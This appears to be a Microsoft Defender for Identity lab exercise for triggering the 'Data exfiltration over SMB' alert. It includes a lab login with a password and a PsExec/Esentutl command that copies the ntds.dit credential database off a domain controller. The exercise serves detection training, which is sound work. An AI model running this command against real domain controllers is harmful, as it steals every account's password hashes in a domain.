Task 6.1: Data exfiltration over SMB

This alert is triggered when suspicious transfers of data are observed from your monitored domain controllers, such as when an attacker copies the ntds.dit file from a domain controller to a workstation.

Tools used in this test: Sysinternals downloads

1. Open a new RDP session to WIN6 using the WIN6.rdp file in the Downloads folder, and then select More choices\Use a different account to sign in using MSMDI\SamiraA using the password Passw0rd12!@

2. Right-click the Windows icon, and then select Windows PowerShell (Admin) to open an elevated PowerShell window, and then run:

    C:\Tools\PSTools\PsExec.exe \\DC01 -accepteula c:\windows\system32\Esentutl.exe /y /i c:\ntds\ntds.dit /d c:\Tools\ntds.dit /vssrec ; Copy-Item -Path "\\DC01\Tools\ntds.dit" -Destination "C:\Tools"
   

The Data exfiltration over SMB alert is triggered when the file is copied off the DC.

Select an alert name to show the alert details page.

Keep in mind that Defender for Identity can also track files uploaded from a workstation or server to a domain controller, which can be useful for detecting abnormal activities. Check for copied files listed in the user page’s Timeline tab.

For more information, review Data exfiltration over SMB (external ID 2030).